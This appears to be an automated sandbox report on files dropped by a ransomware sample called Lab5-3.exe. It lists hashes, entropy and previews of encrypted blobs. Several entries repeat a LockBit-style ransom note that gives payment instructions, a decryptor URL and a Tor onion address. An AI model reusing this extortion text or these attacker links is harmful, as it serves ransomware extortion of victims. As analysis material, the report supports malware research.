                                                                                                          SHA-256:E95EB429E95A16C3DB7CED761A22C7B042142F46488DBB9914FAA0A65348F0FD
                                                                                                          SHA-512:C9DE6E00CBD9A58517B163B2C5A4BAB2323934F0B0873A677A1C01B1FAA63F062DB2F25B7F87A996504136BD3D57A0A2689C4C701075B759436307F6FF331680
                                                                                                          Malicious:false
                                                                                                          Preview:f!K.q8/.........".B{OXtcG..:|dS,.9M.h......4}t.`......y..Hy.v.d.&...+m.]F.9".......A&..V+.".........1.; .B.\.v..V..../..U.Ef......0E...u.8..?uL.@..0zl**.[..f...+....c9.F..A..<......1..8..{"..R.O...a.9..-.#8......h..+..|..z.6?.c..v.......Bw........BQ.....#J....a......&&d...lC.6Q.p..v-.'.....l.j....o...'...2...1..m.a."de.0.2e.A].g...~......R`.Q..>T....l....V...-...5tN~{.8..\J8...<w.;..._..........aX..v...C.4.?w.K...mIN$e}.l..w~.";.8.........iX.e}*|R..q..Q~.+..a.O$<....?..2...rl.=.*.#.....H.[..y..c`..A..O.,.x......GJ..dn.O....W;..k.......{.y.{...p.DAM....K.`....7(o..o..y.l..........Uf.]x{.nC=X.n".....vkN.g0.@.[..N..0f........#.>>KQ1p.:.+p...D4....g..{....:.$,?. .1.h..m..1.b...};/1.rv.;.up.WH.K?eA......M.;8s...J.g}.M.1>Pn......6._j..... ......I..(..e\.......q......^.7F.m.;.I....|..U...azs...Z...E.tF./(.6.6.....ao........9n.>.c.....[.^.']..L..3.Z.;R....tc^+e0.a..5.vi.|. .u...+`....D;..W.Y..c..$.w.v.G. rmb..RD..2^.......%.y.<.R..6..4CEi..C
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2336
                                                                                                          Entropy (8bit):7.915370831975578
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+V0Di+k4A1bfjeSAUTndSgmwGPCvArHfUTid3hBaUoSGFcmeykEdEElU92i:+V0Di+s1fxAURSrwGIA4Gx0uKeY2ElUJ
                                                                                                          MD5:34907635F919519115DB3927FDE45626
                                                                                                          SHA1:23129A9CF3FC3A00A45BDE5A45FA36ADB6355C15
                                                                                                          SHA-256:A0ABBC6D48503B28777994997409DA7C7A30D75733FD37451461880357EE142D
                                                                                                          SHA-512:518B309769B22B402D89915D2BC075199368496E395D165BCA4A84A1C4CC9BD3477F7024B953D1A8FF2B62EA1C67C62F6FEBE792823A01B3C059633AC16B9830
                                                                                                          Malicious:false
                                                                                                          Preview:|...i..wEG0..6...).6....|.YB...%fVA:...$|....]. (....U`s...l^G.^..Q...9 N....^c=!..QU....z.t........Q............&......5.Hx...|.t.mv....1..[..8.....B./......}F.o...N..y....9:JJ..Kf.^.9u.....7...d.N..&a..m..d..Ym........Mx...H.....'mx)A.^....5.9.T.E../........)G`.F.&.Q.....^..x../........ ....Xk.4...zdi..kf....@..x.)...<d.(...>O.....4..N..k..$.|7.....#....t.`...t.3e..b.6*7..0."........U..... /@z{.O/.?.Yx.2...4.M!..ts.uhs.^0..'..m%F......O.D...Y.Cz...o...8.".T=%.........c.9..#/.j.k*....".V.7V.e.'......qK.8e.j.|G.s[. ...7..3.Q@...[...^.A.w..Z@,U.fp2~.p2f.UX=.....nE.$..F.V3...............mq.7.) .....B2..N!VnD.L.yWst..)....A.lW.C.p?.e...y3..8....cjU.5.1..M...7v.M..$y..L..(...l.[...."....s.....*..(....Js........k.GQ\...e|..`...9n...]AO..#7.JQ&..*.q.......Q.."....+6.b{...n...u.%V.r.E..M.5!|.g...$].....H.a.tkpc.B..1...EF....f...p.gu...e#...{......".'c....9......+!...+..t].A.K.Rg..5..B.-...R.*.gL...q.....6.NY.7/_..};.NV....Kkq~N...].5..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4384
                                                                                                          Entropy (8bit):7.962603984534873
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:g1vMrEdzkP3MvbQEwiA9M06P8Gx0uKeY2ElUJ:g5Ddzi8jQEaGvP0Cb
                                                                                                          MD5:170442AB2441A61B3E200386CE827AF1
                                                                                                          SHA1:1C954216242691DC56E8502519581B6DF800888E
                                                                                                          SHA-256:D2986351C373AB5605DDEE05392CDAF4D84FDF8EDF46FB43F7B771680C663B82
                                                                                                          SHA-512:8F0806F2C07B5FB7BDEAFEEF6B4D794329B81641BB6BC3055B64BA510DBA8A00E629FEEA5BC341A5B418E55FDF64A0D15D1A3BDD12E41CD4D11AB6C384BC601F
                                                                                                          Malicious:false
                                                                                                          Preview:N.Lo...@O.......b.7E.>M..eL...2^G.1.m..[w&......V...#..Z...O..s.....t.h.I3.N..:..*p.........|.FL.<...S..].&._.....j..I.].b.,..|....E.....Wn...8........9.......`.&LW.)Dr...!..x*........cok}?........o..ln..KT9H...N=..R,...>....b..p..OS.(u..j.....-;.D...I?7...z...~L ~....3H%...J..cdj.8....`..E.WlD..d...1.'vs....B.X..t$"y.J....m.C.._.w{.`.Nc......Zm...<y.Z..0c.{..~.....E..K.C.*|...V..u..9....C.r..u.:..y..9HH..oa..{5.jbG.%._W..=[.Q...K.e..,..9...P,.s',...x-...#.........,).*.....Q.7...D@..~..Za...!......X...pu..8..e..LA...z..s.v.:.-...L....=....&[.&m...U8hh.....Xe~...5.sZ.....J..8..."..G..7.~.B...[..=.[..T.......iv.p..wo3`..f.T=..s.#.v2."0.....3k..0...V>.8"..*u..Afl.d..G.2.1.2{...)y2.C..a..O.l..3....l...,.x.V..@.0.\tv..8...A=...C...P.X.G....|]-.....h...+.... .'...A1.i.>P...3.W.{...'..B.;.$._....."..#o...}.~r....l../...e.g+5-N[.4....^<6.^.h{}t......)...tp&..#G.eG....979...BD.]g7..3.....]...`.=.?...0l...h.{.V...U)m.$J.. J.@:.k...z.,.2....a.9..*...*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13840
                                                                                                          Entropy (8bit):7.987606255351767
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:pasArCDcG2021lldihgrEBt/JnYI6Epbq/Mw2kI7Dzj9gvQ6itulH+mMPZwj0FdO:pr/Dm0SUQ//MxsitulHY6Q/qtb
                                                                                                          MD5:7A595789D529DDC1E812806FCF4FA78E
                                                                                                          SHA1:AD20963DAC79ACFC4AA9F419D6A82DD2F1DD3FF2
                                                                                                          SHA-256:F48952129FA036E82CF773CEE38D4DD8E982543AE845DFF482CE1000845959F3
                                                                                                          SHA-512:318E12049A24F2A8BF17293CDCC41204D121D74AD803F9DAC0F92C1302BD8BB7FBB9665F628F11C14EBB72BF37C53F68DA422147B16429E95E853EB83682A6FC
                                                                                                          Malicious:false
                                                                                                          Preview:.-b......lw`..@..}2.s.k_Jjf..%&.........*....l..2.E....N.....#.....,0]....8..f...[..XT|y%..)Cv....5.gFp....^...X6jW|...:)."T..-.....<....Q.4>.(..[~*.w..n...gxB..C=.L..B.`.uy&.HphD.F...Cna...b>r..:.....?.SA]G.J..gU...!..r6..+0..J'.)..X....:.3^....vf..z.t?.\6..o..H..U...<....:J.w8X.....n...rD.'/..G.i..d.........(.0...@HF9....8....zc.b....O..>.....'..P.Z.Sd..Od).....6E..x..0.._..z.^^....V~...>.. z7.0...!.V.....3..f.R........Z..._.e......J.3...Xz!.<.....h.;.~P........ S..p.^..O...d.|.l...?..5o..u.1.. ..ia'..Bi.4h.=.C.]\.<...:R....8qc..4n..u.fGL.t?.#....<......w|E.......`.......sRj....`Z..j..[.{...y..?..^;.....Z........)...[W.~..s..O.io..W..Z....`N..'SK}.1$...E..G6.&..Z...G<l...*9......VP...c.....V0.../J..1.p...4.gu....r..MGK..{#.c~Q.t....4...9.Z..H .....#X...F....V..+Y&(cD....d......:.....zp.A..(.x.w3..M.A..?WD6..+M...y..!.2.$`.R..b.E.N...|C.L......q..I.S|.3]k.F.n.8{..^`T.3...jc%.GK..."........(..Y...Z"....I..,Y..M..a...........l...E.`..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):430119
                                                                                                          Entropy (8bit):7.480360264557169
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:cLfMSIX/W17jyUDLdQb3tkQyAxlmZoYh0yh881B:c1W/uvyKLA9dFlmZoYh0yh881B
                                                                                                          MD5:1C4EE9FD7CC74D4D3B31FD7696AF68EE
                                                                                                          SHA1:330D712215400EE1226FF30A635B01CEAAA63620
                                                                                                          SHA-256:267E067F1910B06723615BC24AB9F68635066FF5D311EA51E2C0ABB54ED23109
                                                                                                          SHA-512:035515B01C256012D8DF92A48538F8971C3F559AE66526925F38659817CCBA6B8D987296545AA4DEE0E7E8C0160203963E279C9267B6FA0AC545496D7110C610
                                                                                                          Malicious:false
                                                                                                          Preview:.fc....-..y..O?cd@.}(_.U.i..b.:.W.u.-c.}..7......).N...._Hk...p!$oz..1S}.,..C.uEB:.>K\.._<....0...p.\..>...pJ...,.G.n.y..u.5.u...G..&..>.ca.8.OM:.iO..-..M..VC....L".y...ho....V..u....{;............z_..J.o2$J..]C..... Tc.x...y..?.........Or.N.Z.0....J...i..m. .H..|...../?x.~.5.&an..x....F.q0E.<+.._.?......5.2|[...bw......s...#./k....u.......=..f.G..fq.Dd.~..F<.8-.A;F...n.jH...+...?.J..D..).H"..6B.pu.k..r..7..&.jVq./..I...A.d...l..[....HN.\i.... .F.Ja.|..r^..k^...qF.U.8...3..O...1..........p.......=.X....U..{[......P.....v.&s..S7)R..../.S."l....~.......L.$b....1)N_.r..V."3...V..V*.J.{.f.y..x+...A*.k...2*...#.a.o...~9QX@.6.@.....c0i.f,S..H.Z'....R4h...l...".v..........n..(.....Y`.x.Y.~i .?[p.Ee......g.u..z...K~...*.%.s.E..o..\...9.L...S.m.9;......F.3.ob..=.Q.7...b.&....4.f."..O.m.....>r./`F&.T..;..l.!..:......P...U..]...}.U.i.(..V0b.X...-..*.Co."3]......x..R....}f.r+...ze.v...T.... .....u..OmpK.$.`<..g=.4&......OnW.x.w'..U..=..E.{x.Ay.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):173584
                                                                                                          Entropy (8bit):7.998716074265146
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:UK0x2d0YzdmgZ7zNqlIO8d5bZ9avUYpL30Nkyj8JdRjZ:Wu0YzvZPNqlGnbaRLE+tXjZ
                                                                                                          MD5:773F1FCD451843F6BDDDDEF08F5F15AD
                                                                                                          SHA1:009B4A6075C210D2B2E7C1AAEC0044AEA3819E96
                                                                                                          SHA-256:04CC9F6AC74B7396E6A476BDFC7223616D655AF1509714C48A569302B4EDD213
                                                                                                          SHA-512:13859D6ECA510990682273FC9BB2E66B53137D9F02958AF273CD59D836933416BBD287808C9B976825AAA43FDF461AC7B1F41E499604E8ED1CA615E04EE06058
                                                                                                          Malicious:true
                                                                                                          Preview:bzo].G......i.v5.....;...m...ND..#`SR.Ll.#.!.qS.(.......~U.d.Wo.fw.-.J..._.uM.1yz\*..2d.u.Fz..?z..%.w.Ls..-.}Mh.G.L.:.Z....6..-....4nV{..I.....D2.j..s..Z.O.....{..m../.,...g....7...7..;.o1$hi.073...c.e@..B(......:~.*.o..%x.;..5....?....`..G...5.'.R.....k...H.p..Q..~)..C;...E[.p^..l.Lg.E9...{...B.3..a......fy>...K}.....^.05.......c+....+.......W.."..K....(.......gA.p.eh..V..$.f..........I..S....m.......8)T....j5....#......|D.B.0...4....2...l_j..]..].^....`G....!........."...`.3g..HG.j..z.g..d....b../"+.l...[j...m.6Z./....UZ.-9b.O..F..Qn\....7-...8.$........A...,...l;J.....Y......D.O....v#.s._.x:..C`.l.1...Z./...S...;D,.J.4!..95.U.....Ph....U..~.,....5.^.]y/}.=.qS.I.3 .48.].B..\a..=.9......,A..~.M.i......8j.....u.........7h..M.z.rf?.~...wv~.E..+..Y.q .G.N....v8..@.N.dQ.....RT1.R.Q.r..x..^.l..J....`A....{..*..{.Y]....N... _.:..\~H..g.F...O.S..<C..VON...:.;.......m...d.z..YBh.f.7..Y3....8....;.$...TB9..U.t.._..2&7.B.T...q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):114880
                                                                                                          Entropy (8bit):7.998363646811287
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:168wDrBjtnqAcigjzouI7z2t0px/6jm7eqDZ:XABjdqAMczZxym7eqDZ
                                                                                                          MD5:C1560677BC90ACC8C17D48709B4604B8
                                                                                                          SHA1:187CE42CDEA54A9420E684A9F080924A253B3489
                                                                                                          SHA-256:BB84FD9BC482BD3C3DDB4AA0C8726AACF124CC8D4ECFC5E66B696B965547DE7C
                                                                                                          SHA-512:442AC77F648FD949703A16EE319BE006546929180FAE51494F551B198269A51656484A852EC9BB3E7E0EE16E82EDE7D0A1FD4E35C8982695A75F2F53C43596E7
                                                                                                          Malicious:true
                                                                                                          Preview:....U..NC..Z.F..hUE..U.....&.A0B...Kw..}p."V.."O.....W...[U>...p.`znI|....2.&...^GQ].v...`.a.............R.X..r.......I...s.qm9.r.-o.q.x"./........[Vv... Le...D....^....v.2.D.w.n...oH.....-O.....R.M.h1.g..1sa..UWcm.;F...9..]P?.P..U?F...Q.o.%@..d"W<.........durhlufX'.`..*(..%y9....l.L.).........g...3.&Y..(.b3|..b...M...U...z..Z.u..c...k67....:R.`..v1y....'rNX.R..M/.U@...:.....%...w$J.(.B....S....o.......^.....b....:....m..G}....pu.3Z..ER.I..t..-j"._-.2p(Qo.....e.....3-...Q.w.M9j....R...69.....C..g.=K.ZAo..O.h...B....X.........c.v\.....N.........x.a...../.wYp.5:8^.9. ...}.?.[.?R.n....{......z..S.\.O.bL.Y..~.i...;}..qDd....i]06N..N.Gd...sO.~..K..k.....A......6/. .@.Dn.kU..@...`"}z....~.o.....-.g<+...s..|r;DL.-..g1.yE...p...^'3j.......{......p3..2/..Q..a5.x..NN...X.'..p05..zY....<..g#.~...M....i.#..[.t.}.D.[Y...P;Y0M8..FaH..KND6"....O%:l...=`$b....b..+..y.JwM.F.h.Q'G..Q.(.o.l.r..~.H. .Nct..X^....da.#7.k.......r.......e......~......
